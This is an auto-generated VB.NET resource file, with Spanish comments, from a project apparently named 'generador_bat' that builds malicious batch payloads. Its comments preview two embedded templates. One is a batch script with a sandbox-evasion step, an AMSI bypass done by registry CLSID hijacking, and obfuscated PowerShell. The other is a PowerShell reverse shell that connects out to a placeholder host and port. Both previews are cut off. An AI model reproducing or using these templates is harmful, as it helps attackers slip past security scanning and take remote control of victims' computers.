'------------------------------------------------------------------------------
' <auto-generated>
'     Este código fue generado por una herramienta.
'     Versión de runtime:4.0.30319.42000
'
'     Los cambios en este archivo podrían causar un comportamiento incorrecto y se perderán si
'     se vuelve a generar el código.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'StronglyTypedResourceBuilder generó automáticamente esta clase
    'a través de una herramienta como ResGen o Visual Studio.
    'Para agregar o quitar un miembro, edite el archivo .ResX y, a continuación, vuelva a ejecutar ResGen
    'con la opción /str o recompile su proyecto de VS.
    '''<summary>
    '''  Clase de recurso fuertemente tipado, para buscar cadenas traducidas, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Devuelve la instancia de ResourceManager almacenada en caché utilizada por esta clase.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("generador_bat.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Reemplaza la propiedad CurrentUICulture del subproceso actual para todas las
        '''  búsquedas de recursos mediante esta clase de recurso fuertemente tipado.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Busca un recurso adaptado de tipo System.IO.UnmanagedMemoryStream similar a System.IO.MemoryStream.
        '''</summary>
        Friend ReadOnly Property Alert() As System.IO.UnmanagedMemoryStream
            Get
                Return ResourceManager.GetStream("Alert", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Busca una cadena traducida similar a @echo off
        ''':: Writte file to disk to evade sandbox detection
        '''echo microsoft &gt; %userprofile%\\license.pem
        ''':: AMSI COM Bypass [ 3xploit]
        '''REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
        '''REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
        ''':: Sleep time to refresh regedit
        '''sleep 3
        ''':: local batch variable declarations
        '''sEt !h=e&amp;&amp; sEt U7=n&amp;&amp; sEt k8=d&amp;&amp; sEt db=P
        ''':: Powershell command obfuscated
        '''@c^M%k8% [resto de la cadena truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property code2() As String
            Get
                Return ResourceManager.GetString("code2", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Busca una cadena traducida similar a ${socket} = new-object System.Net.Sockets.TcpClient(&apos;%H%&apos;, %P%);
        '''if($socket -eq $null){exit 1}
        '''$stream = $socket.GetStream();
        '''$writer = new-object System.IO.StreamWriter($stream);
        '''$buffer = new-object System.Byte[] 1024;
        '''$encoding = new-object System.Text.AsciiEncoding;
        '''do
        '''{
        '''	$writer.Flush();
        '''	$read = $null;
        '''	$res = &quot;&quot;
        '''	while($stream.DataAvailable -or $read -eq $null) {
        '''		$read = $stream.Read($buffer, 0, 1024)
        '''	}
        '''	$out = $encoding.GetString($buffer, 0, $read).Replace(&quot;`r`n&quot;,&quot;&quot;).Replace(&quot;`n&quot;,&quot;&quot; [resto de la cadena truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property shell() As String
            Get
                Return ResourceManager.GetString("shell", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
